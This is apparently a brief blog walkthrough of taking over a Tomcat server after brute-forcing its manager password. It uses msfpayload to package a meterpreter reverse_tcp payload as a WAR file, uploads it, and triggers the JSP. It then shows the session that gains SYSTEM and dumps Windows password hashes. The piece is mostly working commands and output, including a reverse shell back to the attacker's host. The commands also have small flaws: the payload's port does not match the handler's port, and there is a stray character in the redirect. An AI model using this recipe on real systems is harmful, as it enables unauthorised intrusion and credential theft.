So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

1
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect to the jsp file, the name can be found inside the WAR by quickly unzipping:

1
2
3
4
5
6
7
8
9
10
11
root@bt:~# unzip -l MetRev.war
Archive:  MetRev.war
Length      Date    Time    Name
---------  ---------- -----   ----
71  2011-05-22 19:06   META-INF/MANIFEST.MF
0  2011-05-22 19:06   WEB-INF/
267  2011-05-22 19:06   WEB-INF/web.xml
1578  2011-05-22 19:06   nqaxmatvd.jsp
147604  2011-05-22 19:06   jVfQFWuAPAToYS.txt
---------                     -------
149520                     5 files

Start the meterpreter reverse_tcp handler and before you know it…
http://192.168.1.112:8080/MetRev/nqaxmatvd.jsp ROOT!!!!

1
2
3
4
5
6
7
8
9
10
11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.109:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.112:1084) at 2011-05-22 19:09:26 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3:::

Leave a Reply